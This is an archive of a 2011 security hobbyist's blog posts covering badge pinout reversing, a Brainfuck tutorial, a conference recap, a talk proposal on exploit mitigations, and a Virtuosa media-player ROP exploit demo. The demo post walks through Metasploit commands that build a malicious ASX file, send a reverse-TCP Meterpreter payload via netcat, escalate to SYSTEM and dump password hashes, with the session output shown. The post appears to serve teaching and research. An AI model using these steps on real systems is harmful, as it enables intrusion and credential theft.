jeudi 30 juin 2011

[EN] NDH 2011 badge hacking part 1 : Pinout reversing

* UPDATED (6 July 2011) *:
- Fixed links (ATMEL documentation)
- Added section on full pinout


Hello!

Today we are going to do some "hardware" hacking (if we can call it like that ...). Yes, NDH badge hacking :D.
I do not have any real knowledge in electronics but it should be enough to pawn it.

The thing I am the most amazed with is that nobody wrote an article about it but the creator of the badge (tixlegeek) ...

Let's fix that!

The situation

First of all, I could not not find the pinout on Tix's Le Geek blog so I had to "reverse" it.
It is because I have the following programmer (a version of USBasp):



So the cable is a 2x5 pin ICSP AVR.

We want to have something clean so we are going to use a BUS cable:


As well as small clips:



To plug it into a small socket:


To set up the clips, you need to use a flat-nosed plier like this:


For reversing the pinout you could also use wires and a breadboard (I don't have a breadboard ... or any electronic stuffs ^^"):


Don't forget your NDH badge!


In the end you should have all those:


Reversing the pinout

Ok for the pinout you could try to find VCC and GND first with a multimeter and then the other ports. As I do not have any electronic equipment I haven't tried that.

But here what was my idea with the wires :


Yeah, try to craft kind of a hook or something and plug the other part to a breadboard and test it.


 luckily there is another way to find out about the pinout:



Yes just looking at the chip documentation you could find the pinout.
Anyway for the chip, looking close enough you could see its reference:
ATMEL 1114
ATTINY2313V-10SU

Done we have the pinout.
Just have to make the cable ;).

The pinout

Badge NDH
-------------------------------------------------
    |       |       |       |       |       |
   RST    MOSI    MISO     SCK     VCC      GND


Port 2x5 ping AVR ICSP

    1           3         5           7          9
---------------------------------------------------------
|   MOSI    |   NC  |   RESET   |   SCK     |   MISO    |
---------------------------------------------------------
|   VCC     |   GND |   GND     |   GND     |   GND     |
---------------------------------------------------------
    2           4         6           8          10

Do the pinout and then we're in business :).

Full pinout

Just in case people might find this useful:
-------------------------
|          PORTD        |
-------------------------
|   PIND0   |   RX      |
|   PIND1   |   TX      |
|   PIND2   |   D4      |
|   PIND3   |   D3      |
|   PIND4   |   D2      |
|   PIND5   |   D1      |
|   PIND6   |   D5      |
-------------------------
|          PORTB        |
-------------------------
|   PINB0   |   D6      |
|   PINB1   |   D7      |
|   PINB2   |   NC      |
|   PINB3   |   NC      |
|   PINB4   |   NC      |
|   PINB5   |   MOSI    |
|   PINB6   |   MISO    |
|   PINB7   |   SCK     |
-------------------------
|          PORTA        |
-------------------------
|   PINA0   |   NC      |
|   PINA1   |   NC      |
|   PINA2   |   RESET   |
-------------------------

It is evident that you need to read the documentation to understand that table: the chip documentation.

Conclusion

With a bit of curiosity, it was possible to find out about the pinout fairly easily.
As I miscounted  the AVR ICSP pinout ... my cable is not right, so the software part is going to be for another day ;).

Cheers,

m_101

Resources:
[NDH2K11] Badges hackable!
NDH2K11's Badge: Spec. & hackz
NDH2K11's Badge: PROGRAMMATIONNNNNN!!!!
- ATTiny2313 documentation

mercredi 29 juin 2011

Brainfuck: Get ready to get your brain crushed!

Hello!

Here it is ... maybe another useless post about a useless langage :p.
Today, ... it will be about brainfuck!
The name really fit the langage ... cause in the end, your brain get completely crushed from it :p. Worst than ASM I swear :) ... but fun nonetheless ;).

Well, what can you do in brainfuck? Well basically anything, it's turing complete.

Let's first start with basic instructions.

Basic instructions

In Brainfuck you only have 8 instructions to remember:
inst  equivalent
>     ++ptr;
<     --ptr;
+     ++*ptr;
-     --*ptr;
.     putchar(*ptr);
,     *ptr=getchar();
[     while (*ptr) {
]     }

That's all you basically get :).

Let's see what we can do with it.

Hello world!

Brainfuck as you'll see is mostly about value generation than "real logic".

We would like to print the famous "Hello World!".
Well, brainfuck use the ASCII standard for its characters so we have to generate the ASCII value for H, e, l, etc un til we get our whole string.
This is done using loops, I generally do it using the following pattern:
counter = value; (power of 2: 2, 4, 8)
while (counter) {
    x += n;
    counter--;
}
if (odd)
    x += 1;
It basically is equivalent to:
odd: value * n + 1
even: value * n

For H we have the ASCII value of 72, this value is divisible by 8 (and 9).
counter = 8 and n = 9. It gives the following brainfuck code:
>++++++++[<+++++++++++++>-]<+>

Here is my code for "Hello World!":
>++++++++[<+++++++++>-]
>++++[<+++++++++++++++++++++++++>-]<+>
>++++[<+++++++++++++++++++++++++++>-]
>++++[<+++++++++++++++++++++++++++>-]
>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]<+>
>++++++++[<++++>-]
>++[<+++++++++++++++++++++++++++++++++++++++++++>-]<+>
>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]<+>
>++[<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++>-]
>++++[<+++++++++++++++++++++++++++>-]
>++++[<+++++++++++++++++++++++++>-]
>++++++++[<++++>-]<+>
<<<<<<<<<<<<
.>.>.>.>.>.>.>.>.>.>.>.>

Yeah it is complicated :).
Basically I first construct my whole string in memory then I go back to the beginning of the string and print it all.

Conditions

We will do the basic if ... else construct, afterward you will be able to construct more complex conditions.

The idea is to use the loop and execute only once depending of the value of a cell.
My construct is as follow:
[
[-]         make sure we execute the loop only once

put your code here

>
-
>        end the loop
]

<+       if we already went into the first branch then the cell = 0 and the loop doesn't execute
[
[-]         make sure we execute the loop only once

put another code here

>        end the loop
]

Try it with a different prepend such as nothing, ++++, ++++----, etc.

Addition

Let's say we want to add 3+1?

We would have the following brainfuck code for 3:
+++
And for 1:
+

Basically the idea is to decrement one of the cells and add it to the other using a loop.

The code:
+++    cell[0] = 3
>
+         cell[1] = 1

<         go to cell 0
[          while (cell[0]) {
-              --cell[0]
>+          cell++; ++cell[1]
<             go back to cell 0
]          }
And here it is, we have 4 in cell 1.

Substraction

It's the same principle as the addition but with the - symbol ;).

Multiplication

Look at the "Hello World!" part, that's how we do multiplication.

Division

Not really though about it.

That's it!

That's it for my post on brainfuck but if you want to continue the fun, feel free to do so.
Here is my brainfuck code generator for printing messages if you want to play with it a bit:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LEN     1024

// construct a string with a n length and the same byte
unsigned char* repeat_byte (unsigned char byte, int n) {
    char *repeated;
    int idxRepeat;

    repeated = calloc(n + 1, sizeof(byte));
    for (idxRepeat = 0; idxRepeat < n; idxRepeat++) {
        repeated[idxRepeat] = byte;
    }

    return repeated;
}

/*
>  ++ptr;
<  --ptr;
+  ++*ptr;
-  --*ptr;
.  putchar(*ptr);
,  *ptr=getchar();
[  while (*ptr) {
]  }
*/
// generate value in cell[0]
char* val2bf (unsigned char byte) {
    char *bf;
    int remainder, maxcount, divisor;
    // index into brainfuck str
    int idxBf;
    //
    unsigned char *repeated;

    // allocation
    bf = calloc(MAX_LEN, sizeof(*bf));
    if (!bf)
        return NULL;

    // counter value
    remainder = byte % 8;
    if (remainder == 0 || remainder == 1)
        maxcount = 8;
    else {
        remainder = byte % 4;
        if (remainder == 0 || remainder == 1)
            maxcount = 4;
        else {
            remainder = byte % 2;
            maxcount = 2;
        }
    }

    divisor = (byte - remainder) / maxcount;

    //
    strncat(bf, ">", MAX_LEN - strlen(bf));

    //
    repeated = repeat_byte('+', maxcount);
    strncat(bf, repeated, MAX_LEN - strlen(bf));
    free(repeated);

    // loop
    strncat(bf, "[", MAX_LEN - strlen(bf));
    // go forward
    strncat(bf, "<", MAX_LEN - strlen(bf));
    // increment
    repeated = repeat_byte('+', divisor);
    strncat(bf, repeated, MAX_LEN - strlen(bf));
    free(repeated);
    // go back to counter
    strncat(bf, ">-", MAX_LEN - strlen(bf));
    // end loop
    strncat(bf, "]", MAX_LEN - strlen(bf));
    if (remainder)
        strncat(bf, "<+>", MAX_LEN - strlen(bf));

    // ajust allocation
    bf = realloc(bf, strlen(bf) + 1);

    return bf;
}

// ascii string to bf string
char* ascii2bf (char *ascii, int len) {
    char *bf, *bfVal, *rewind;
    //
    int idxAscii;
    //
    int szBf = MAX_LEN, lenBf = 0;

    // allocate memory
    bf = calloc(szBf, sizeof(*bf));
    if (!bf)
        return NULL;

    for (idxAscii = 0; idxAscii < len; idxAscii++) {
        bfVal = val2bf(ascii[idxAscii]);

        // track bf len and size
        lenBf += strlen(bfVal);
        if (lenBf > szBf) {
            szBf *= 2;
            bf = realloc(bf, szBf);
        }

        // construct bf string
        strncat(bf, bfVal, szBf - strlen(bf));
        strncat(bf, "\n", szBf - strlen(bf));
        free(bfVal);
    }
    // return to beginning of string
    rewind = repeat_byte('<', len);
    strncat(bf, rewind, szBf - strlen(bf));
    free(rewind);
    strncat(bf, "\n", szBf - strlen(bf));

    return bf;
}

// print given ascii string
char* bfPrint (char *ascii, int len) {
    char *bf = ascii2bf(ascii, len);
    int szBf;

    // bf size + free space ">." and null
    szBf = strlen(bf) + 2 * len + 1;
    bf = realloc(bf, szBf * sizeof(*bf));
    if (!bf)
        return NULL;

    while (len--)
        strncat(bf, ".>", szBf - strlen(bf));

    return bf;
}

int main (int argc, char *argv[]) {
    char *bf;

    // check arguments
    if (argc < 2) {
        printf("usage: %s str\n", argv[0]);
        return 1;
    }

    bf = bfPrint(argv[1], strlen(argv[1]));
    if (!bf)
        printf("Allocation failed\n");
    else {
        printf("%s\n", bf);
        free(bf);
    }        

    return 0;
}

It certainly does not generate optimized brainfuck code but at least it works :). Moreover, I digged out most of the important bugs so it should mostly be bug free ... should you find any bugs ... don't hesitate to tell me/contribute :p.

Conclusion

If you managed to survive up to here, you saw what is brainfuck, some stuffs we can do with it. Mostly an esoteric langage but still "fun" and "interesting" to study it for its theory.

Cheers,

Have fun,

m_101

Resources:
- Brainfuck on Wikipedia
- BrainFuck Beginners Tutorial
- Javascript Brainfuck Interpreter / Debugger
- Brainfuck JS (interpreter & debugger) 
- Brainfuck interpreter (JavaScript)
- Brainfuck Developer

jeudi 23 juin 2011

[NDH2011] Demo: Virtuosa full ROP connectback stager

Hello everyone!

This post will be about my demo I prepared for my talk at the NDH2011. As you know, it failed! It was due to some metasploit depency problem (I checked and netcat receive the connection from the VM).

Introduction

The following ROP sploit was based on the following exploit: Virtuosa Phoenix Edition 5.2 ASX SEH BOF.
Basically, if we have a href which is too long, we trigger a SEH BOF.
The problem is that it has a character filter, all UPPER are converted to LOWER and all LOWER near a special character such as " -;,\\/" (without the quotes) will get converted to an UPPER character.
Basically, it forbids all existing encoders, even alpha 2!
There are 2 solutions to bypass this restrictive filter: either code an lower encoder or use a ROP payload. I chose the second solution as I haven't seen any public exploit using a full ROP payload.

I won't explain how to exploit a SEH BOF since it has been explained many times, the interesting part here will be about the ROP techniques used. I will explain techniques but I won't go through the code as it is already heavily commented (if you still don't understand it, don't hesitate to ask).

Just so you know, it is not for the faint of heart, it really is not an easy task, it mostly takes a LOT of time.

The filter

The character filter looked a lot like the following C code:
char* filter_badchar (char *str, size_t len) {
    size_t sz;
    char c;

    for (sz = 0; sz < len; sz++) {
        c = str[sz];
        if (c == ' ' || c == ';' || c == '-' || c == '\\' || c == '/' || c == '-') {
            if (str[sz+1] >= 'a' && str[sz+1] <= 'z')
                str[sz+1] = str[sz+1] - 0x20;
        }
        else if (str[sz+1] >= 'A' && str[sz+1] <= 'Z')
            str[sz+1] = str[sz+1] + 0x20;
    }

    return str;
}

You either bypass it using an encoder or a ROP payload.

The payload

I had multiple prerequisites for my payload to satisfy me:
- bypass firewalls
- bypass NAT
- be flexible as to the stuffs I can do
- full ROP
So basically, I was requesting for a connectback stager.

So my payload do the following:
- copy ROP stack to a static zone (so it easier to fix arguments and such)
- allocate RWX memory: HeapCreate() + HeapAlloc()
- initialize socket
- connect back to host (attacker machine)
- receive payload in allocated memory
- execute payload

If the connection fail in some ways, the exploit will fail, there is no backup or infinite loop for trying (even though it could be implemented using ROP tricks). There are multiple problem to be solved before getting to our ROP payload: we need to construct it. Effectively, there is import resolution, string tables fixing, address fixing, arguments fixing. The goal is to get to avoid bad chars as well.

The ROP Stack

What is really important to understand while ropping is that we are constructing, patching/fixing/modifying stack elements in order to have a chain of functions calls using basic operation (that we call gadgets). We could also use it to construct a payload in a newly obtained WX memory or receive "traditionnal" payloads. ROP is thus mainly used as a "stager" in the sense that we first use it to get WX memory and then use a "normal" payload. ROP is turing complete as it is possible to do anything we want with it. We can write, save in memory and we can also have conditions! I suggest you to read the paper on ROP stack generation which also speak about it (LAHF and PUSHF).

Ok now on with the show :).
Since we are triggering a SEH BOF, we will have a ROP stack splitted in 2 parts: before and after the overwritten SEH handler. It is about calculating offsets and bytes used, nothing too heavy in there. What I did is that I mainly constructed my ROP payload and then I splitted it.

In the ROP stack I basically do the following:
- get ESP - set up arguments of LoadLibrary()
- resolve LoadLibrary()
- LoadLibrary("ws2_32.dll");
- resolve GetProcAddress()
- Set all GetProcAddress() function name argument
- end strings correctly (with NULL)
- fix wsastartup to WSAStartup and fix wsacleanup to WSACleanup
- Set hLibModule argument in all corresponding GetProcAddress() to "LoadLibrary("ws2_32.dll")"
- resolve imports
- then we have the part were we set up all the arguments of the payload
- we "execute" the payload
- we get a stager sent by metasploit that will get a payload (such as a DLL injector or something like that) or a payload (launch calc! :))

These things happen so fast that you should not forget to have listeners, handlers ready at the other end of the line ... or Virtuosa will just gracefully crash with you not getting anything ;).

How do you construct a ROP payload without getting lost?

Believe it or not, it's really easy to get lost while developing a ROP payload.
Thing is: we often wants to generate values that have the same properties (=> power of 2? divisible by x? etc). Or we want to be able to allocate multiple buffers?

The "secret ingredient" is the same as in programming: "divide to conquer". Create functions that does a specific thing using gadgets. This way you can re-use it. The problem it poses is about optimisation, but you either get ultra optimised ROP stack or well organized one. Your choice ;). In the future, tools to optimise and maintain ROP sploits will be developed anyway (MONA is the beginning, thanks to c0relanc0d3r and others as well).

How to avoid badchars in a ROP payload?

As you will see in the code, I created multiple function to check that I have addresses with good characters only. I used the principle of pointer encoding, in this case additive encoding (subtractive decoding) was used.

For NULLs, we can use these kind of instructions:
- XOR REG32, REG32
- MOV [REGa32], REGb32
- etc
For other values, you have to generate them. What is good to know is that most of the "flags" values used in function calls are power of 2, it is simply because it is easy to use multiple flags at the same time and extract them with logical/arithmetical operations: AND, XOR, ADD, SUB, etc.

Most of the time, these kind of instructions can be found:
- XCHG EAX, ESI
- XCHG EAX, ECX
- ADD ESI, ESI
- INC EAX
- XOR EAX, EAX
- MOV [ECX], EAX
With those instructions you can generate any values and patch the memory as you see fit.

There are other tricks to know too. You want to substract but you only have access to ADD? ... Think about integer overflow. The goal is not really to substract but to correctly compute a certain value. In the end, ADD and SUB works mostly the same in digital logic.

Others techniques to avoid badchars, instead of constantly fixing all the addresses you have, which use quite a big amount of pointers, I decided to use a retslide to shift to the addresses of interest and thus avoid any bad addresses.

In short:
- pointer encoding
- generating values
- integer overflows
- retslide

Other stuffs to know about ROPping

Most of the strings in Windows functions are NULL terminated (ASCII based) even though it supports UNICODE. You thus have to have correctly ended strings.
For that:
- XOR EAX, EAX
- MOV [ECX], EAX
These can be quite useful to fix the stack up.

While calling a function, the most common technique is to fix the stack up using patching instructions:
- MOV [ECX], EAX
You could also use PUSHAD which is kind of a ugly hack but it can be useful to know.

While calling a function, if it takes a string arguments, be sure that your string table is upper in memory (lower in the stack) as the function could end up crushing over your string table and make the call fail. It is often the case with Win32 API calls since it ends in the kernel and it ends up crushing a lot of stuff upper in the stack (lower in memory).

Moving around in our payload is mostly done with:
- XCHG EAX, ESP
It is quite an interesting instruction as using it cleverly, you could have infinite loops, branching, etc.
So before using that instruction, be sure to get ESP somewhere (using stuff like PUSHAD and POPS or PUSH ESP # POP REG32).

Ok you're lacking registers? Use memory!
Most of the gadgets use EAX, ECX and ESI, if you're stuck with registers, try using RW memory to save your value and recover it later.

How to use the sploit?

This sploit is sure not user friendly.
It is made for hacker alike anyway.
I could have done it without metasploit ... but it has so many convenient payloads ... why reinvent the wheel? ;)

Anyway here is the "manual": - Depending on the type of payload you're selecting (with or without network, without means it's usually a standalone payload that doesn't need a stager such as it is the case with calc) you'll either need 2 or 3 terminals on the host machine.

- First terminal: generating the file
$ ./msfconsole 

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #


       =[ metasploit v3.7.2-release [core:3.7 api:1.0]
+ -- --=[ 705 exploits - 358 auxiliary - 56 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r13015 updated today (2011.06.23)

msf > use exploit/windows/fileformat/virtuosa 
msf exploit(virtuosa) > show options 

Module options (exploit/windows/fileformat/virtuosa):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.asx          yes       The file name
   LHOST                      yes       The listen address
   LPORT                      yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 English


msf exploit(virtuosa) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(virtuosa) > set LPORT 8080
LPORT => 8080
msf exploit(virtuosa) > exploit 

[*] Before SEH:
[*] String table size     : 100
[*] Pointers used         : 126 (504 bytes)
[*] Junk bytes used       : 288
[*] Padding size          : 96
[*] ROP stack size        : 1029
[*] Bytes before SEH write: -4

[*] Total:
[*] Pointers used         : 486 (1944 bytes)
[*] Junk bytes used       : 416
[*] ROP stack size        : 2597
[*] Creating 'msf.asx' file ...
[*] Generated output file /home/kurapix/.msf3/data/exploits/msf.asx
msf exploit(virtuosa) > 

Here the host and port will point at the machine with the listening netcat

- Second terminal: netcat listener (send payload or stager)
$ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 --format raw | nc -v -l 8080
En fait je me suis rendu compte que c'est là où ma démo a merdé: j'avais oublié de spécifié le LHOST lors de mon talk.
Sous le coup du stress et de manque de temps, j'ai préféré passer à la suite du talk.
C'était la première fois que je faisais un talk devant autant de monde après tout.

- Third terminal: sending the payload if stager needed
$ ./msfconsole 

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.2-release [core:3.7 api:1.0]
+ -- --=[ 705 exploits - 358 auxiliary - 56 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r13015 updated today (2011.06.23)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > exploit 

[*] Started reverse handler on 0.0.0.0:4444 
[*] Starting the payload handler...

- Then you can launch Virtuosa and import the ASX file (and pawn it).
You will then get the following in the second terminal (netcat listener):
Connection from 192.168.56.101 port 8080 [tcp/http-alt] accepted
You will then get the following in the third terminal:
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1091) at Thu Jun 23 20:12:21 +0100 2011

meterpreter > getuid 
Server username: EXPERIEN-FB44F4\Administrator
meterpreter > getsystem 
...got system (via technique 1).
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ASPNET:1003:c0a59a9e0736c578ddde1757bd48098f:0aff8f664031790f6cf554a30d834161:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:611c44014cc419901607081e8472f214:c9c888b7f1894ba4b72503ca73afc10d:::
SUPPORT_388945a0?  :1002:aad3b435b51404eeaad3b435b51404ee:c0c37c4d63b49404638bb9898744285c:::
meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                           Path
 ---   ----              ----  -------  ----                           ----
 0     [System Process]                                                
 4     System            x86   0        NT AUTHORITY\SYSTEM            
 532   smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 596   csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 620   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 664   services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 676   lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 836   VBoxService.exe   x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\VBoxService.exe
 884   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 960   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1052  svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1108  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1200  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1616  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1776  explorer.exe      x86   0        EXPERIEN-FB44F4\Administrator  C:\WINDOWS\Explorer.EXE
 1884  VBoxTray.exe      x86   0        EXPERIEN-FB44F4\Administrator  C:\WINDOWS\system32\VBoxTray.exe
 1896  ctfmon.exe        x86   0        EXPERIEN-FB44F4\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2008  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1316  alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 828   wuauclt.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wuauclt.exe
 1104  Virtuosa.exe      x86   0        EXPERIEN-FB44F4\Administrator  C:\Program Files\Virtuosa\Virtuosa.exe

meterpreter > 


If you want to use those kind of payloads: shell_reverse_tcp, meterpreter, etc. metasploit first send a stager then the corresponding payload. The thing is ... exploits/multi/handler only sends the payload and not the stager so you basically get a crash (ever tried to directly execute a DLL from its first byte? => crash, need a DLL injector or something like that). That is why we need the netcat listener which send the stager for those payloads.

For payloads such as calc, regedit, messagebox, etc, no stager needed, we directly get the payload from msfvenom.
For example for messagebox, you generate the file and then have that in the netcat listener terminal:
$ ./msfvenom --payload windows/messagebox ICON=WARNING TEXT="Hacked by m_101 :)" --format raw | nc -v -l 8080
Connection from 192.168.56.101 port 8080 [tcp/http-alt] accepted

You basically end up having a nice messagebox like this:


The sploit

Just so you know, for struct sockaddr_in, I used ugly hacks (since I couldn't find htons, ntohs, etc equivalent) so it should only work on x86 or x86_64 (due to endianness).

Link to the sploit: Virtuosa Phoenix Edition 5.2 Full ROP Connectback Stager .

Conclusion

By now, you should be quite convinced that we really do not need any code in our crafted file in order to do things. The question is more about the space we have at disposal that the possibilities ;).

For a first talk in front of so many people it did not go that bad.
Ok the demo failed and I panicked a bit about it I must admit haha.
Next time I'll prepare myself even more!
Video is the key ;).

We have seen many techniques concerning ROPping, hope it helps to get you along on this boat. It is not easy, it is not for everyone but it is without a doubt an essential technique to have in our arsenal of tools. I wonder what it is like to have ASLR+DEP bypass though and working only with offsets .... infoleaks? ... well ... not today.

Cheers,

m_101

lundi 20 juin 2011

[EN] NDH2011: Bilan

Hi folks!



NDH2011 is over!
It was awesome, there were more girls, more people, more talks, new sex toys (have you seen the crazy CTF machines? :)), etc.


The talks

There weren't that many technical conferences this year, some were refreshing, others almost killed me (especially the one on "Social security").

I've seen the following conferences:
- Hacking android for fun and profit - Damien Cauquil: Too bad they changed the planning and didn't update the website. I've seen only a part of it but it was really good, it went about Android security functionalities, etc, and a demo on a homemade tracking spyware.

- Reinventing Old School Security - Bruno Kerouanto: Wow! Refreshing! Awesome history of hacking stuffs :). Bluebox, démos, Apple II, etc. It would be awesome to have that kind of old school devices at NDH.

- Recherche de vulnérabilités en kernel Windows - Stéfan Le Berr: This one was pretty good actually. Stéfan talked about finding Windows kernel vulnerabilities using a fuzzing tool he created. His tool, "Zero Fuzz" was able to hook syscalls in order to fuzz them in parallel. Anyway, not a bad name for that kind of tools: ring 0 afterall.

I missed most of the "Hacking girls" talk :(. Hope there will be some videos posted somewhere.

This year I gave 2 conferences. One about an ISP and another about exploitation. It was quite an interesting experience.
I was quite stressed at the beginning of the first talk then afterward you get to like being on stage.
Being a speaker is about preparation after all, talking to a public, nothing more nothing less.
In the end, talking to 50 or 1000 people is mostly the same.
Just so you know if you want to do a talk: prepare a backup like a video! Yeah my demo failed :p. I checked and it was metasploit having some kind of dependency problem (netcat did receive my connection afterall ;)). If you are looking for my slides, here they are: Exploitation in a hostile world .
I just hope not being busted for the ISP conference, we do not and did not intend to do any harm. Our goal was to get it fix and nothing less, nothing more.

The CTF

After the conference we were greeted by some lateness for the CTF. We waited over 6 hours just to know that the last 2 teams last in rank in the prequals were disqualified due to technical problems.
Around midnight we were starting to get prepared to start the CTF ... which was cancelled. There were some teams (as ours) who did not get any DHCP or any connection at all.
In the end, it even demotivated us to play the public CTF (we did not even have to inject anything in the public WiFi since someone was pawning it ...). I've just looked a bit into the Crackme, it was about unpacking it using OEP (which was around PUSH OEP | RET) and then reversing the obfuscating function (XOR) to bruteforce the key to find what was the PNG image about. I didn't do the bruteforce part.

Too bad for the CTF, but well ... it happens. Computers are either working or not, we all know that. Best luck next year I hope :).

The rest

There were a lot of interesting workshops.
There was lockpicking, console hacking, msf, etc.

For those who could not get one, there were around 120 electronic badges such as those (the black one with the LEDs):

The goal is to decode the messages sent by the LEDs and it can be reprogrammed at will.
It is using an Atmel ATtiny2313V-10SU which is a nice little micro-controller with 2KB of memory and running at 10MHz.
There is 7 red LEDs (why not 8? It would have been 1 byte), a small battery and a 6 PINs connector to reprogram it.
I'm waiting to get my ATTiny programmer before playing with it :).

Conclusion

Well, I really enjoyed it, really awesome that it was at one of Disney convention center!
We had more room, more talks, more people, and most of all it was fun.

Thanks folks for feedback (and help, Latzaf, etc) on my exploitation conference,

Thanks to my team mates for the ISP conference :).

Thanks to the organisators (Heurs, Virtualabs, Trance, CrashFr, Olive, and all Sysdream/HZV people :)),

If you are looking for photos, I took some: Night Da Hack 2011 Photos .

See you next year,

m_101

dimanche 12 juin 2011

[NDH] Are you ready?

Hello everyone :)!


This will be my first conference as a talker so be tolerant ;).

I will be giving a conference on modern exploitation at NDH 2001 (Night Da Hack 2011) on the 18th of June.
The conference will be in French with English slides. I expect to see more French people than English speaking people like any other NDH I have been to. Moreover, I am more comfortable with French even thought my English is not that bad.

Here is forth my proposal:

Proposal

Software hacking and counter measures have gone a long way since the dis-
covery of hacking techniques. Techniques have improved over time and made
exploitation harder and harder, most traditional exploits do not work any-
more nowadays.

Since we are speaking about software hacking, a short review of exploita-
tion techniques will be done. It will include format strings and buffer based
overflows.

Software hacking techniques are now well known for most of them, more
might be discovered. The need of mitigation arose quickly with highly net-
worked environments. One of the first mitigation to be implemented were
security cookies, followed by NX and then ASLR for the major ones. Other
protections such as FORTIFY SOURCE have also been implemented. A
brief look into these protections will be given.

The use of new and advanced techniques have emerged and are developed
either by attackers or academics in order to bypass these new mitigation
schemes against software exploitation. Such techniques includes code re-use
techniques such as Return Oriented Programming, information leaks, heap
spray or SEH (stack cookies).

A thought about the future of software hacking and counter measures will
also be given.

So what is it about?

It is mostly about the requirement needed for an exploit developer to succeed in its task of writing reliable exploit working on the latest Operating Systems and compilers. This is effectively needed as pentests could be carried out more efficiently.

The presented protections:
- DEP/NX: Non executable pages
- ASLR: Address Space Layout Randomization, randomization of pages
- SafeSEH: "Basic" SEH protection ("replaced by" or "upgraded to" SEHOP in Vista SP1)
- Stack Cookies (GS mostly, StackGuard does not work exactly the same): Protection of return address (SEIP) against buffer overflows attacks

All of their bypass will be explained.

A demo on bypassing DEP/NX will be done, it includes a full ROP multistage exploit I developed especially for the occasion.

And finally some thoughts will be given on the future of exploitation and mitigations. It is based on current research, projects and papers so it might not be that far from reality but anyone who try to predict the future will somehow fail in some way. So it is more there to give ideas on what might be good fields in exploitation research.

Conclusion

Waiting to get your hands dirty and having practical knowledge on software exploitation?
It might be a good subject to speak about, but 30 minutes to speak about it is just not enough at all! So don't expect too much technicality even though I will try to.
A lot of stuff had to be taken out in order to make the talk fit the time given, it does not really matter as the most important protection are presented and explained. For those who do not know anything about exploitation, it might be a good (hard) introduction to the field.

Do not hesitate to ask questions ;) (the talk = 30 minutes of talk and 10-15 minutes of questions approximately ;)).

And even more! Do not hesitate with the beers, fun and hacks!
What's a conference if we do not enjoy it? ... work ... ;)

Hope to see you there,

Cheers,

m_101